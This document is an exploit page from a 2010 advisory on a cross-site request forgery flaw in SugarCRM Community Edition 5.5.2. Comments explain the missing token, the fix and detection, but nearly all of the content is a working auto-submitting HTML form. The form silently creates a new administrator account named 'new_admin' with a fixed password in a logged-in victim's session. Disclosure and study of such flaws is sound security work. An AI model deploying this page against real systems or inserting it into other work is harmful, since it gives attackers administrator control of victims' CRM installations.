<!--=========================================================================================================# # _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ # # /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ # # ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) # # /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ # # \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ # # )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ # # \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ # # # #============================================================================================================# # # # Vulnerability............Cross-site Request Forgery # # Software.................SugarCRM Community Edition 5.5.2 # # Download.................http://www.sugarcrm.com/crm/download/sugar-suite.html # # Date.....................5/30/10 # # # #============================================================================================================# # # # Site.....................http://cross-site-scripting.blogspot.com/ # # Email....................john.leitch5@gmail.com # # # #============================================================================================================# # # # ##Description## # # # # A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create # # a new admin. 
##Proof of Concept##
-->
<!--
  Proof of concept for the advisory in the header above: a page that, once loaded
  in a logged-in victim's browser, auto-submits a cross-origin POST to the Users
  module's Save action. Note what the request does NOT contain: no unpredictable,
  per-session anti-CSRF token. The server therefore accepts it on the strength
  of the victim's session cookie alone, which is the missing control. The
  application-side fix is a server-verified per-session token on every
  state-changing request (with SameSite cookie attributes and Origin/Referer
  checks as defence in depth); on the detection side, a user-creation request
  whose Origin/Referer is a foreign site is the signal to alert on.
-->
<html>
  <body onload="document.forms[0].submit()">
    <!-- Target host below is the lab address from the original advisory. -->
    <form method="POST" action="http://192.168.1.4/sugarcrm/index.php">
      <!-- Tab-layout fields submitted alongside the user record. -->
      <input name="display_tabs_def" type="hidden" value="display_tabs[]=Home&display_tabs[]=Dashboard&display_tabs[]=Calendar&display_tabs[]=Activities&display_tabs[]=Leads&display_tabs[]=Contacts&display_tabs[]=Accounts&display_tabs[]=Opportunities&display_tabs[]=Emails&display_tabs[]=Campaigns&display_tabs[]=Cases&display_tabs[]=Documents&">
      <input name="hide_tabs_def" type="hidden" value="">
      <input name="remove_tabs_def" type="hidden" value="">
      <!-- Routing: module/action/page select the Users EditView save handler. -->
      <input name="module" type="hidden" value="Users">
      <input name="record" type="hidden" value="">
      <input name="action" type="hidden" value="Save">
      <input name="page" type="hidden" value="EditView">
      <input name="return_module" type="hidden" value="Users">
      <input name="return_id" type="hidden" value="">
      <input name="return_action" type="hidden" value="DetailView">
      <!-- Account fields. The admin flags and UserType are what turn this from a
           plain user creation into the privilege escalation the advisory describes;
           none of these is protected by a request-specific secret. -->
      <input name="password_change" type="hidden" value="true">
      <input name="required_password" type="hidden" value="1">
      <input name="user_name" type="hidden" value="">
      <input name="type" type="hidden" value="">
      <input name="is_group" type="hidden" value="0">
      <input name="portal_only" type="hidden" value="">
      <input name="is_admin" type="hidden" value="1">
      <input name="is_current_admin" type="hidden" value="1">
      <input name="required_email_address" type="hidden" value="0">
      <input name="sugar_user_name" type="hidden" value="new_admin">
      <input name="unique_name" type="hidden" value="">
      <input name="first_name" type="hidden" value="">
      <input name="status" type="hidden" value="Active">
      <input name="last_name" type="hidden" value="a">
      <input name="UserType" type="hidden" value="Administrator">
      <input name="old_password" type="hidden" value="">
      <input name="new_password" type="hidden" value="Password1">
      <input name="confirm_new_password" type="hidden" value="Password1">
      <!-- E-mail widget and contact fields, left at their defaults. -->
      <input name="emailAddressWidget" type="hidden" value="1">
      <input name="emailAddress0" type="hidden" value="">
      <input name="emailAddressPrimaryFlag" type="hidden" value="emailAddress0">
      <input name="emailAddressVerifiedFlag0" type="hidden" value="true">
      <input name="emailAddressVerifiedValue0" type="hidden" value="">
      <input name="useEmailWidget" type="hidden" value="true">
      <input name="email_link_type" type="hidden" value="sugar">
      <input name="mail_smtpuser" type="hidden" value="">
      <input name="mail_smtppass" type="hidden" value="">
      <input name="employee_status" type="hidden" value="Active">
      <input name="title" type="hidden" value="">
      <input name="phone_work" type="hidden" value="">
      <input name="department" type="hidden" value="">
      <input name="phone_mobile" type="hidden" value="">
      <input name="reports_to_name" type="hidden" value="">
      <input name="reports_to_id" type="hidden" value="">
      <input name="phone_other" type="hidden" value="">
      <input name="phone_fax" type="hidden" value="">
      <input name="phone_home" type="hidden" value="">
      <input name="messenger_type" type="hidden" value="">
      <input name="messenger_id" type="hidden" value="">
      <input name="address_street" type="hidden" value="">
      <input name="address_city" type="hidden" value="">
      <input name="address_state" type="hidden" value="">
      <input name="address_postalcode" type="hidden" value="">
      <input name="address_country" type="hidden" value="">
      <input name="description" type="hidden" value="">
      <!-- User preference defaults as the EditView form would send them. -->
      <input name="receive_notifications" type="hidden" value="12">
      <input name="export_delimiter" type="hidden" value=",">
      <input name="mailmerge_on" type="hidden" value="0">
      <input name="reminder_time" type="hidden" value="60">
      <input name="default_export_charset" type="hidden" value="ISO-8859-1">
      <input name="user_max_tabs" type="hidden" value="12">
      <input name="user_max_subtabs" type="hidden" value="12">
      <input name="user_subpanel_tabs" type="hidden" value="on">
      <input name="dateformat" type="hidden" value="m/d/Y">
      <input name="currency" type="hidden" value="-99">
      <input name="timeformat" type="hidden" value="H:i">
      <input name="default_currency_significant_digits" type="hidden" value="2">
      <input name="timezone" type="hidden" value="Africa/Abidjan">
      <input name="ut" type="hidden" value="0">
      <input name="num_grp_sep" type="hidden" value=",">
      <input name="default_locale_name_format" type="hidden" value="s f l">
      <input name="dec_sep" type="hidden" value=".">
      <input name="calendar_publish_key" type="hidden" value="">
      <input name="outboundtest_from_address" type="hidden" value="">
    </form>
  </body>
</html>